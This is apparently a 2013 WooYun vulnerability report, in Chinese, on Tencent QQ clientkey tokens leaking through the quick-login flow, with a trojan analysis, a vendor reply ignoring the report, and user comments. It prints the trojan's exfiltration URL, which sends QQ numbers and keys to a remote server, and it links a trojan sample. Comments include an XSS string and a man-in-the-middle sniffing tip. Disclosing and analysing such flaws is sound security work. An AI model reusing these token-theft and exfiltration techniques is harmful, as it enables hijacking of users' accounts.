当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-042676

漏洞标题:QQ帐号一站式Key的安全漏洞(附利用实例样本)

相关厂商:腾讯

漏洞作者: 路人甲

提交时间:2013-11-12 16:47

修复时间:2013-11-13 14:51

公开时间:2013-11-13 14:51

漏洞类型:账户体系控制不严

危害等级:高

自评Rank:15

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2013-11-12: 细节已通知厂商并且等待厂商处理中
2013-11-13: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

QQ帐号一站式Key没有使用安全协议,导致在页面间传递泄露,可以利用这个key操作QQ空间、腾讯微博等,为一种新型QQ盗号思路,目前已经出现利用工具

详细说明:

本漏洞是本人在做木马分析时候发现,具体流程如下
1)木马利用QQ的快捷登录控件,请求http://xui.ptlogin2.qq.com/cgi-bin/qlogin
然后点击页面上的登录,腾讯服务器会返回一个clientkey和当前登录的qq号并且跳转到www.qq.com

http://ptlogin2.qq.com/undefined?clientuin=54160134x&clientkey=00015281B6FE00686FAF6D75E76ECC7D6DB2C1BB1CA3D14091C87E306776F04DDE11D6F90600AF9C84AC930D98CB9C86148525D2EA1376442C0B6D43C51BEC5BFBA9685E37D9BD9A192FCF8B70E3498C86314DF5E7D06512E347516BEEFF72A0CB07087F461A701B70FCB567C3E5xxx


clientuin是当前登录QQ,而这个clientkey有什么用呢?攻击者可以利用qq对应的clientkey登录到腾讯旗下任意网站(QQ空间、微博等)


2)木马将获取到clientkey把获取到的clientuin及clientkey发送到远程服务器,不断刷新这个clientkey,使其有效,那么就可以利用有效的clientkey操作这个qq号的说说、日志、签名、分享、群成员
这个漏洞目前已经出现利用实例:http://www.mileyx.com
木马样本:http://wydrops-wordpress.stor.sinaapp.com/uploads/2013/11/t.rar

漏洞证明:

上述流程你可以自己亲手试下
木马窃取clientuin及clientkey流程截图:

1.jpg


如图:木马利用QQ的快捷登录获取clientuin及clientkey。

2.jpg


可以从上图中看出qq及clientkey最后会通过如下请求发送到木马所有者的服务器上

http://www.mileyx.com/info/daicheng/get.asp?qq=【clientuin】&key=【clientkey】

修复方案:

null

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2013-11-13 14:51

厂商回复:

非常感谢您的报告。这个问题我们经过评估,暂未发现可以对用户或者业务产生影响,故不作处理。如果您对于该结论有任何的疑问,欢迎反馈指正,我们会有专人跟进处理。

最新状态:

暂无

漏洞评价:

评论

  1. 2013-11-12 16:51 | Finger 认证白帽子 ( 普通白帽子 | Rank:777 漏洞数:95 | 最近有人冒充该账号行骗,任何自称Finger并...)

    早该考虑的安全问题,却非要等到有人开始利用!

  2. 2013-11-12 17:00 | 0ps ( 实习白帽子 | Rank:43 漏洞数:10 | xo)

    围观路人甲

  3. 2013-11-12 18:47 | adwin ( 普通白帽子 | Rank:112 漏洞数:11 | 小菜请多指教。)

    说的是clientkey么?几年前就很多人搞了,现在基本已经没有人愿意搞了。

  4. 2013-11-12 19:23 | 鬼魅羊羔 ( 普通白帽子 | Rank:299 漏洞数:42 | (#‵′)凸(#‵′)凸(#‵′)凸(#‵′)凸(#‵...)

    指的是skey? 这东西确实是通用的邮箱、个人中心、webQQ、空间、微博,都是。。。o_cookie和uid可以自己构造,关键的地方就是这个skey。。

  5. 2013-11-12 21:06 | 兜帽 ( 路人 | Rank:3 漏洞数:3 | "><script>alert("xss")</script>)

    这个很早前就有了,你们有米有发现这个key是每隔几个小时更改一次的,不信你们都试试,这个腾讯估计会忽视掉

  6. 2013-11-12 21:27 | 233 ( 路人 | Rank:14 漏洞数:4 | 小孩子看了根本把持不住)

    clientkey吧,上个月腾讯某图标点进去直接泄露clientkey了,=_=我提交竟然没通过审核

  7. 2013-11-13 10:16 | 雷锋小号 ( 路人 | 还没有发布任何漏洞 | 乌云现在就缺我这种默默顶贴从来不求脸熟的...)

    最神奇的一群人,智慧低调又内敛,俗称马甲,打酱油的,不明真相的群众等

  8. 2013-11-13 13:14 | c2y2 ( 路人 | Rank:11 漏洞数:8 | 屌丝it男一枚)

    clientkey 局域网 中间人 然后加urlsnarf 随时看漂亮美眉的加密相册

  9. 2013-11-13 16:25 | solihat ( 路人 | Rank:10 漏洞数:3 | white hat,webapp security)

    http://www.mileyx.com/article-7-1.html

  10. 2013-11-30 02:50 | 克里格 ( 路人 | Rank:11 漏洞数:1 | ...)

    就算半小时心跳一次 skey也会在48小时内强制失效